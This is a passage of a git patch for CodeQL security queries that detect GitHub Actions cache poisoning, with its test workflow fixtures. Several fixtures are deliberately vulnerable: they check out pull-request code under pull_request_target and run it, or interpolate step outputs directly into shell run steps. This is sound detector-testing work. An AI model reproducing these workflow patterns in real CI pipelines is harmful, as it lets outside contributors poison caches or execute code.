UsesStep { this.getArgument("bundler-cache") = "true" } - // TODO: Try to get the actual path being cached - override string getPath() { result = "?" } + override string getPath() { result = "vendor/bundle" } } From d18179850d6fc9557172372376dfc81aa993c939 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 6 Aug 2024 12:04:34 +0200 Subject: [PATCH 456/707] Split Cache Poisoning queries in 3 Split them into 3 queries depending of how the cache can be poisoned: - control of cached files - execution of controlled code - code injection Remove `setup-XXX` actions from CacheWriting class since the cached files are not in the CWD --- ...n.ql => CachePoisoningViaCodeInjection.ql} | 2 +- ...ing.ql => CachePoisoningViaDirectCache.ql} | 49 ++++------ .../CachePoisoningViaPoisonableStep.ql | 58 +++++++++++ .../{test9.yml => code_injection1.yml} | 0 .../.github/workflows/code_injection2.yml | 16 +++ .../{test1.yml => direct_cache1.yml} | 0 .../{test2.yml => direct_cache2.yml} | 0 .../{test11.yml => direct_cache3.yml} | 0 .../{test15.yml => direct_cache4.yml} | 0 .../{test16.yml => direct_cache5.yml} | 0 .../{test23.yml => direct_cache6.yml} | 0 .../{test10.yml => neg_code_injection1.yml} | 0 .../{test13.yml => neg_direct_cache1.yml} | 0 .../{test14.yml => neg_direct_cache2.yml} | 0 .../{test22.yml => neg_direct_cache3.yml} | 0 .../{test12.yml => neg_poisonable_step1.yml} | 0 .../{test18.yml => neg_poisonable_step2.yml} | 16 +-- .../CWE-349/.github/workflows/poc.yml | 63 ------------ .../CWE-349/.github/workflows/poc2.yml | 58 ----------- .../CWE-349/.github/workflows/poc3.yml | 64 ------------ .../{test8.yml => poisonable_step1.yml} | 0 .../{test17.yml => poisonable_step2.yml} | 0 .../.github/workflows/poisonable_step3.yml | 19 ++++ .../.github/workflows/poisonable_step4.yml | 18 ++++ .../.github/workflows/poisonable_step5.yml | 28 ++++++ .../CWE-349/.github/workflows/test19.yml | 42 -------- .../CWE-349/.github/workflows/test20.yml | 46 --------- .../CWE-349/.github/workflows/test21.yml | 44 --------- .../CWE-349/.github/workflows/test3.yml | 23 ----- .../CWE-349/.github/workflows/test4.yml | 21 ---- .../CWE-349/.github/workflows/test5.yml | 19 ---- .../CWE-349/.github/workflows/test6.yml | 18 ---- .../CWE-349/.github/workflows/test7.yml | 17 ---- .../Security/CWE-349/CachePoisoning.expected | 98 ------------------- .../Security/CWE-349/CachePoisoning.qlref | 2 - .../CachePoisoningByCodeInjection.expected | 20 ---- .../CachePoisoningByCodeInjection.qlref | 2 - .../CachePoisoningViaCodeInjection.expected | 11 +++ .../CachePoisoningViaCodeInjection.qlref | 2 + .../CachePoisoningViaDirectCache.expected | 48 +++++++++ .../CachePoisoningViaDirectCache.qlref | 2 + .../CachePoisoningViaPoisonableStep.expected | 49 ++++++++++ .../CachePoisoningViaPoisonableStep.qlref | 2 + 43 files changed, 275 insertions(+), 582 deletions(-) rename ql/src/Security/CWE-349/{CachePoisoningByCodeInjection.ql => CachePoisoningViaCodeInjection.ql} (96%) rename ql/src/Security/CWE-349/{CachePoisoning.ql => CachePoisoningViaDirectCache.ql} (68%) create mode 100644 ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql rename ql/test/query-tests/Security/CWE-349/.github/workflows/{test9.yml => code_injection1.yml} (100%) create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection2.yml rename ql/test/query-tests/Security/CWE-349/.github/workflows/{test1.yml => direct_cache1.yml} (100%) rename ql/test/query-tests/Security/CWE-349/.github/workflows/{test2.yml => direct_cache2.yml} (100%) rename ql/test/query-tests/Security/CWE-349/.github/workflows/{test11.yml => direct_cache3.yml} (100%) rename ql/test/query-tests/Security/CWE-349/.github/workflows/{test15.yml => direct_cache4.yml} (100%) rename ql/test/query-tests/Security/CWE-349/.github/workflows/{test16.yml => direct_cache5.yml} (100%) rename ql/test/query-tests/Security/CWE-349/.github/workflows/{test23.yml => direct_cache6.yml} (100%) rename ql/test/query-tests/Security/CWE-349/.github/workflows/{test10.yml => neg_code_injection1.yml} (100%) rename ql/test/query-tests/Security/CWE-349/.github/workflows/{test13.yml => neg_direct_cache1.yml} (100%) rename ql/test/query-tests/Security/CWE-349/.github/workflows/{test14.yml => neg_direct_cache2.yml} (100%) rename ql/test/query-tests/Security/CWE-349/.github/workflows/{test22.yml => neg_direct_cache3.yml} (100%) rename ql/test/query-tests/Security/CWE-349/.github/workflows/{test12.yml => neg_poisonable_step1.yml} (100%) rename ql/test/query-tests/Security/CWE-349/.github/workflows/{test18.yml => neg_poisonable_step2.yml} (54%) delete mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/poc.yml delete mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/poc2.yml delete mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/poc3.yml rename ql/test/query-tests/Security/CWE-349/.github/workflows/{test8.yml => poisonable_step1.yml} (100%) rename ql/test/query-tests/Security/CWE-349/.github/workflows/{test17.yml => poisonable_step2.yml} (100%) create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step3.yml create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step4.yml create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step5.yml delete mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test19.yml delete mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test20.yml delete mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test21.yml delete mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test3.yml delete mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test4.yml delete mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test5.yml delete mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test6.yml delete mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test7.yml delete mode 100644 ql/test/query-tests/Security/CWE-349/CachePoisoning.expected delete mode 100644 ql/test/query-tests/Security/CWE-349/CachePoisoning.qlref delete mode 100644 ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected delete mode 100644 ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.qlref create mode 100644 ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected create mode 100644 ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.qlref create mode 100644 ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected create mode 100644 ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.qlref create mode 100644 ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected create mode 100644 ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.qlref diff --git a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql b/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql similarity index 96% rename from ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql rename to ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql index e7f1385f3cda..685bdcca401f 100644 --- a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql +++ b/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql @@ -1,5 +1,5 @@ /** - * @name Cache Poisoning via low-privilege code injection + * @name Cache Poisoning via low-privileged code injection * @description The cache can be poisoned by untrusted code, leading to a cache poisoning attack. * @kind path-problem * @problem.severity error diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql similarity index 68% rename from ql/src/Security/CWE-349/CachePoisoning.ql rename to ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql index 3807cb4b592d..ea36bcf0be1c 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql @@ -1,11 +1,11 @@ /** - * @name Cache Poisoning + * @name Cache Poisoning via caching of untrusted files * @description The cache can be poisoned by untrusted code, leading to a cache poisoning attack. * @kind path-problem * @problem.severity error * @precision high * @security-severity 7.5 - * @id actions/cache-poisoning + * @id actions/cache-poisoning/direct-cache * @tags actions * security * external/cwe/cwe-349 @@ -45,6 +45,8 @@ query predicate edges(Step a, Step b) { a.getNextStep() = b } from LocalJob j, Event e, Step source, Step s, string message, string path where + // the job checkouts untrusted code from a pull request or downloads an untrusted artifact + j.getAStep() = source and ( source instanceof PRHeadCheckoutStep and message = "due to privilege checkout of untrusted code." and @@ -54,46 +56,35 @@ where message = "due to downloading an untrusted artifact." and path = source.(UntrustedArtifactDownloadStep).getPath() ) and + // the checkout/download is not controlled by an access check + not exists(ControlCheck check | check.protects(source, j.getATriggerEvent())) and j.getATriggerEvent() = e and // job can be triggered by an external user e.isExternallyTriggerable() and - // the checkout is not controlled by an access check - not exists(ControlCheck check | check.protects(source, j.getATriggerEvent())) and ( // the workflow runs in the context of the default branch runsOnDefaultBranch(e) or - // the workflow caller runs in the context of the default branch + // the workflow's caller runs in the context of the default branch e.getName() = "workflow_call" and exists(ExternalJob caller | caller.getCallee() = j.getLocation().getFile().getRelativePath() and runsOnDefaultBranch(caller.getATriggerEvent()) ) ) and - // the job checkouts untrusted code from a pull request - j.getAStep() = source and + // the job writes to the cache + // (No need to follow the checkout/download step since the cache is normally write after the job completes) + j.getAStep() = s and + s instanceof CacheWritingStep and ( - // the job writes to the cache - // (No need to follow the checkout step as the cache writing is normally done after the job completes) - j.getAStep() = s and - s instanceof CacheWritingStep and - ( - // we dont know what code can be controlled by the attacker - path = "?" - or - // we dont know what files are being cached - s.(CacheWritingStep).getPath() = "?" - or - // the cache writing step reads from the path the attacker can control - not path = "?" and controlledCachePath(s.(CacheWritingStep).getPath(), path) - ) and - not s instanceof PoisonableStep + // we dont know what code can be controlled by the attacker + path = "?" or - // the job executes checked-out code - // (The cache specific token can be leaked even for non-privileged workflows) - source.getAFollowingStep() = s and - s instanceof PoisonableStep and - // excluding privileged workflows since they can be exploited in easier circumstances - not j.isPrivileged() - ) + // we dont know what files are being cached + s.(CacheWritingStep).getPath() = "?" + or + // the cache writing step reads from a path the attacker can control + not path = "?" and controlledCachePath(s.(CacheWritingStep).getPath(), path) + ) and + not s instanceof PoisonableStep select s, source, s, "Potential cache poisoning in the context of the default branch " + message diff --git a/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql b/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql new file mode 100644 index 000000000000..ee2719f06112 --- /dev/null +++ b/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql @@ -0,0 +1,58 @@ +/** + * @name Cache Poisoning via execution of untrusted code + * @description The cache can be poisoned by untrusted code, leading to a cache poisoning attack. + * @kind path-problem + * @problem.severity error + * @precision high + * @security-severity 7.5 + * @id actions/cache-poisoning/poisonable-step + * @tags actions + * security + * external/cwe/cwe-349 + */ + +import actions +import codeql.actions.security.ArtifactPoisoningQuery +import codeql.actions.security.UntrustedCheckoutQuery +import codeql.actions.security.CachePoisoningQuery +import codeql.actions.security.PoisonableSteps +import codeql.actions.security.ControlChecks + +query predicate edges(Step a, Step b) { a.getNextStep() = b } + +from LocalJob j, Event e, Step source, Step s, string message, string path +where + // the job checkouts untrusted code from a pull request or downloads an untrusted artifact + j.getAStep() = source and + ( + source instanceof PRHeadCheckoutStep and + message = "due to privilege checkout of untrusted code." and + path = source.(PRHeadCheckoutStep).getPath() + or + source instanceof UntrustedArtifactDownloadStep and + message = "due to downloading an untrusted artifact." and + path = source.(UntrustedArtifactDownloadStep).getPath() + ) and + // the checkout/download is not controlled by an access check + not exists(ControlCheck check | check.protects(source, j.getATriggerEvent())) and + j.getATriggerEvent() = e and + // job can be triggered by an external user + e.isExternallyTriggerable() and + ( + // the workflow runs in the context of the default branch + runsOnDefaultBranch(e) + or + // the workflow's caller runs in the context of the default branch + e.getName() = "workflow_call" and + exists(ExternalJob caller | + caller.getCallee() = j.getLocation().getFile().getRelativePath() and + runsOnDefaultBranch(caller.getATriggerEvent()) + ) + ) and + // the job executes checked-out code + // (The cache specific token can be leaked even for non-privileged workflows) + source.getAFollowingStep() = s and + s instanceof PoisonableStep and + // excluding privileged workflows since they can be exploited in easier circumstances + not j.isPrivileged() +select s, source, s, "Potential cache poisoning in the context of the default branch " + message diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test9.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/test9.yml rename to ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection1.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection2.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection2.yml new file mode 100644 index 000000000000..9c87340d7ab6 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection2.yml @@ -0,0 +1,16 @@ +name: Test + +on: + pull_request_target: + branches: [ master, main, dev ] + +jobs: + test: + name: Test + runs-on: ubuntu-latest + steps: + - id: modified_files + uses: trilom/file-changes-action@v1.2.4 + with: + output: "," + - run: echo "${{ steps.modified_files.outputs.files_modified }}" diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/test1.yml rename to ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache1.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test2.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache2.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/test2.yml rename to ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache2.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test11.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache3.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/test11.yml rename to ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache3.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test15.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache4.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/test15.yml rename to ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache4.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test16.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache5.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/test16.yml rename to ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache5.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test23.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/test23.yml rename to ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test10.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_code_injection1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/test10.yml rename to ql/test/query-tests/Security/CWE-349/.github/workflows/neg_code_injection1.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test13.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/test13.yml rename to ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache1.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test14.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache2.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/test14.yml rename to ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache2.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test22.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache3.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/test22.yml rename to ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache3.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test12.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_poisonable_step1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/test12.yml rename to ql/test/query-tests/Security/CWE-349/.github/workflows/neg_poisonable_step1.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test18.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_poisonable_step2.yml similarity index 54% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/test18.yml rename to ql/test/query-tests/Security/CWE-349/.github/workflows/neg_poisonable_step2.yml index 6bfdc5b7d50a..be1533f22312 100644 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test18.yml +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_poisonable_step2.yml @@ -5,27 +5,13 @@ on: push: branches: - main - - 'releases/*' jobs: - verify-build: + test: runs-on: ubuntu-latest - steps: - uses: actions/checkout@v4 with: ref: ${{ github.event.pull_request.head.sha }} - - - name: Setup Node.js - uses: actions/setup-node@v4 - with: - node-version-file: .nvmrc - - - name: Install NPM dependencies - run: npm ci - - - name: Rebuild the dist/ directory - run: npm run build - - name: Compare the expected and actual dist/ directories run: bin/check-build-output-in-dist-directory diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/poc.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/poc.yml deleted file mode 100644 index 6900c3bc23fa..000000000000 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/poc.yml +++ /dev/null @@ -1,63 +0,0 @@ -# This workflow uses actions that are not certified by GitHub. -# They are provided by a third-party and are governed by -# separate terms of service, privacy policy, and support -# documentation. - -# Sample workflow for building and deploying a Jekyll site to GitHub Pages -name: Deploy Jekyll site to Pages preview environment -on: - # Runs on pull requests targeting the default branch - pull_request_target: - branches: ["main"] -# Sets permissions of the GITHUB_TOKEN to allow deployment to GitHub Pages -permissions: - contents: read - pages: write - id-token: write -# Allow only one concurrent deployment per PR, skipping runs queued between the run in-progress and latest queued. -# However, do NOT cancel in-progress runs as we want to allow these production deployments to complete. -concurrency: - group: 'pages-preview @ ${{ github.event.pull_request.head.label || github.head_ref || github.ref }}' - cancel-in-progress: false -jobs: - # Build job - build: - # Limit permissions of the GITHUB_TOKEN for untrusted code - permissions: - contents: read - runs-on: ubuntu-latest - steps: - - name: Checkout - uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 - with: - # For PRs make sure to checkout the PR branch - ref: ${{ github.event.pull_request.head.ref }} - repository: ${{ github.event.pull_request.head.repo.full_name }} - - name: Setup Pages - uses: actions/configure-pages@983d7736d9b0ae728b81ab479565c72886d7745b # v5 - - name: Build with Jekyll - uses: actions/jekyll-build-pages@b178f9334b208360999a0a57b523613563698c66 # v1 - with: - source: ./ - destination: ./_site - - name: Upload artifact - # Automatically uploads an artifact from the './_site' directory by default - uses: actions/upload-pages-artifact@56afc609e74202658d3ffba0e8f6dda462b719fa # v3 - # Deployment job - deploy: - environment: - name: 'Pages Preview' - url: ${{ steps.deployment.outputs.page_url }} - # Sets permissions of the GITHUB_TOKEN to allow deployment to GitHub Pages - permissions: - contents: read - pages: write - id-token: write - runs-on: ubuntu-latest - needs: build - steps: - - name: Deploy to GitHub Pages - id: deployment - uses: actions/deploy-pages@d6db90164ac5ed86f2b6aed7e0febac5b3c0c03e # v4 - with: - preview: 'true' diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/poc2.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/poc2.yml deleted file mode 100644 index 5501beb9ea2f..000000000000 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/poc2.yml +++ /dev/null @@ -1,58 +0,0 @@ -name: branch-deploy - -on: - issue_comment: - types: [created] - -# Permissions needed for reacting and adding comments for IssueOps commands -permissions: - pull-requests: write - deployments: write - contents: write - checks: read - -jobs: - branch-deploy: - name: branch-deploy - if: # only run on pull request comments and very specific comment body string as defined in our branch-deploy settings - ${{ github.event.issue.pull_request && - (startsWith(github.event.comment.body, '.deploy') || - startsWith(github.event.comment.body, '.noop') || - startsWith(github.event.comment.body, '.lock') || - startsWith(github.event.comment.body, '.help') || - startsWith(github.event.comment.body, '.wcid') || - startsWith(github.event.comment.body, '.unlock')) }} - runs-on: ubuntu-latest - - steps: - - name: branch-deploy - id: branch-deploy - uses: github/branch-deploy@v9 - with: - trigger: ".deploy" - environment: "production" - sticky_locks: "true" # https://github.com/github/branch-deploy/blob/1f6516ef5092890ce75d9e97ca7cbdb628e38bdd/docs/hubot-style-deployment-locks.md - - # Check out the ref from the output of the IssueOps command - - uses: actions/checkout@v4 - if: ${{ steps.branch-deploy.outputs.continue == 'true' }} - with: - ref: ${{ steps.branch-deploy.outputs.ref }} - - - uses: ruby/setup-ruby@d4526a55538b775af234ba4af27118ed6f8f6677 # pin@v1.172.0 - if: ${{ steps.branch-deploy.outputs.continue == 'true' }} - with: - bundler-cache: true - - - name: bootstrap - if: ${{ steps.branch-deploy.outputs.continue == 'true' }} - run: script/bootstrap - - # Here we run a deploy. It is "gated" by the IssueOps logic and will only run if the outputs from our branch-deploy step indicate that the workflow should continue - - name: deploy - if: ${{ steps.branch-deploy.outputs.continue == 'true' && steps.branch-deploy.outputs.noop != 'true' }} - run: | - set -o pipefail - script/deploy | tee deploy.out - bundle exec ruby script/ci/render_deploy_message.rb - rm deploy.out diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/poc3.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/poc3.yml deleted file mode 100644 index 4d5ae1f528cd..000000000000 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/poc3.yml +++ /dev/null @@ -1,64 +0,0 @@ -name: Publish - -on: - push: - branches: - - main - pull_request_target: - workflow_dispatch: - workflow_call: - -jobs: - build-and-upload: - runs-on: ubuntu-latest - permissions: - contents: read - steps: - - - name: Checkout PR - if: ${{ github.event_name == 'pull_request_target' }} - uses: actions/checkout@v3 - with: - ref: ${{ github.event.pull_request.head.ref }} - repository: ${{ github.event.pull_request.head.repo.full_name }} - - - name: Checkout - if: ${{ github.event_name != 'pull_request_target' }} - uses: actions/checkout@v3 - with: - ref: main - - - name: Setup Pages - uses: actions/configure-pages@v1 - - name: Use Node.js - uses: actions/setup-node@v3 - with: - node-version: 18 - cache: npm - - name: Update npm to latest - run: npm i --prefer-online --no-fund --no-audit -g npm@latest - - run: npm -v - - run: npm i --ignore-scripts --no-audit --no-fund --package-lock - - run: npm run build -w www - - name: Upload artifact - uses: actions/upload-pages-artifact@v1 - with: - path: './workspaces/www/build' - - deploy: - runs-on: ubuntu-latest - needs: build-and-upload - environment: - name: github-pages - url: ${{ steps.deployment.outputs.page_url }} - permissions: - pages: write - id-token: write - outputs: - deployment_url: ${{ steps.deployment.outputs.page_url }} - steps: - - name: Deploy to GitHub Pages - id: deployment - uses: actions/deploy-pages@v1 - with: - preview: ${{ github.event_name == 'pull_request_target' }} diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test8.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/test8.yml rename to ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step1.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test17.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step2.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/test17.yml rename to ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step2.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step3.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step3.yml new file mode 100644 index 000000000000..8539bf2bda43 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step3.yml @@ -0,0 +1,19 @@ +name: Publish + +on: + pull_request_target: + +jobs: + build-and-upload: + runs-on: ubuntu-latest + permissions: + contents: read + steps: + + - name: Checkout PR + uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + + - run: npm run build -w www diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step4.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step4.yml new file mode 100644 index 000000000000..6e2351c17446 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step4.yml @@ -0,0 +1,18 @@ +name: OpenAPI +on: + pull_request_target: + +permissions: {} + +jobs: + + openapi-base: + runs-on: ubuntu-latest + permissions: read-all + steps: + - name: Checkout repository + uses: actions/checkout@a5ac7e51b41094c92402da3b24376905380afc29 # v4.1.6 + with: + ref: ${{ github.event.pull_request.head.sha }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + - run: ./foo diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step5.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step5.yml new file mode 100644 index 000000000000..9742bd01a48a --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step5.yml @@ -0,0 +1,28 @@ +name: Test +on: + pull_request_target: + branches: ["main"] + +permissions: + contents: read + pages: write + id-token: write + +jobs: + build: + permissions: + contents: read + runs-on: ubuntu-latest + steps: + - name: Checkout + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + - name: Setup Pages + uses: actions/configure-pages@983d7736d9b0ae728b81ab479565c72886d7745b # v5 + - name: Build with Jekyll + uses: actions/jekyll-build-pages@b178f9334b208360999a0a57b523613563698c66 # v1 + with: + source: ./ + destination: ./_site diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test19.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test19.yml deleted file mode 100644 index 1f0e7291442c..000000000000 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test19.yml +++ /dev/null @@ -1,42 +0,0 @@ -name: Close Translation Pull Requests - -on: - pull_request_target: - branches: [ master, main, dev ] - -jobs: - - close-translation-prs: - - name: Close Translation Pull Requests - runs-on: ubuntu-latest - - steps: - - name: Get changed files - id: modified_files - uses: trilom/file-changes-action@v1.2.4 - with: - output: "," - - - name: Check the PR for translations - id: check - run: | - shopt -s nocasematch - if [[ "${{ steps.modified_files.outputs.files_modified }}" == *"en_gb/strings.po"* ]]; then - echo "Found modified en_gb, likely a valid PR" - unset CLOSE - elif [[ "${{ steps.modified_files.outputs.files_modified }}" == *"strings.po"* ]]; then - echo "Found modified strings.po, unwanted." - CLOSE="true" - elif [[ "${{ steps.modified_files.outputs.files_added }}" == *"strings.po"* ]]; then - echo "Found added strings.po, unwanted." - CLOSE="true" - elif [[ "${{ steps.modified_files.outputs.files_removed }}" == *"strings.po"* ]]; then - echo "Found removed strings.po, unwanted." - CLOSE="true" - else - echo "No strings.po were modified or added, not a translation." - unset CLOSE - fi - echo ::set-output name=close::${CLOSE} - diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test20.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test20.yml deleted file mode 100644 index a07f2922fd7a..000000000000 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test20.yml +++ /dev/null @@ -1,46 +0,0 @@ -name: Publish - -on: - push: - branches: - - main - pull_request_target: - workflow_dispatch: - workflow_call: - -jobs: - build-and-upload: - runs-on: ubuntu-latest - permissions: - contents: read - steps: - - - name: Checkout PR - if: ${{ github.event_name == 'pull_request_target' }} - uses: actions/checkout@v3 - with: - ref: ${{ github.event.pull_request.head.ref }} - repository: ${{ github.event.pull_request.head.repo.full_name }} - - - name: Checkout - if: ${{ github.event_name != 'pull_request_target' }} - uses: actions/checkout@v3 - with: - ref: main - - - name: Setup Pages - uses: actions/configure-pages@v1 - - name: Use Node.js - uses: actions/setup-node@v3 - with: - node-version: 18 - cache: npm - - name: Update npm to latest - run: npm i --prefer-online --no-fund --no-audit -g npm@latest - - run: npm -v - - run: npm i --ignore-scripts --no-audit --no-fund --package-lock - - run: npm run build -w www - - name: Upload artifact - uses: actions/upload-pages-artifact@v1 - with: - path: './workspaces/www/build' diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test21.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test21.yml deleted file mode 100644 index 381cc16a6d16..000000000000 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test21.yml +++ /dev/null @@ -1,44 +0,0 @@ -name: OpenAPI -on: - push: - branches: - - master - tags: - - 'v*' - pull_request_target: - -permissions: {} - -jobs: - - openapi-base: - name: OpenAPI - BASE - if: ${{ github.base_ref != '' }} - runs-on: ubuntu-latest - permissions: read-all - steps: - - name: Checkout repository - uses: actions/checkout@a5ac7e51b41094c92402da3b24376905380afc29 # v4.1.6 - with: - ref: ${{ github.event.pull_request.head.sha }} - repository: ${{ github.event.pull_request.head.repo.full_name }} - fetch-depth: 0 - - name: Generate openapi.json - run: dotnet test tests/Jellyfin.Server.Integration.Tests/Jellyfin.Server.Integration.Tests.csproj -c Release --filter "Jellyfin.Server.Integration.Tests.OpenApiSpecTests" - - publish-unstable: - name: OpenAPI - Publish Unstable Spec - if: ${{ github.event_name != 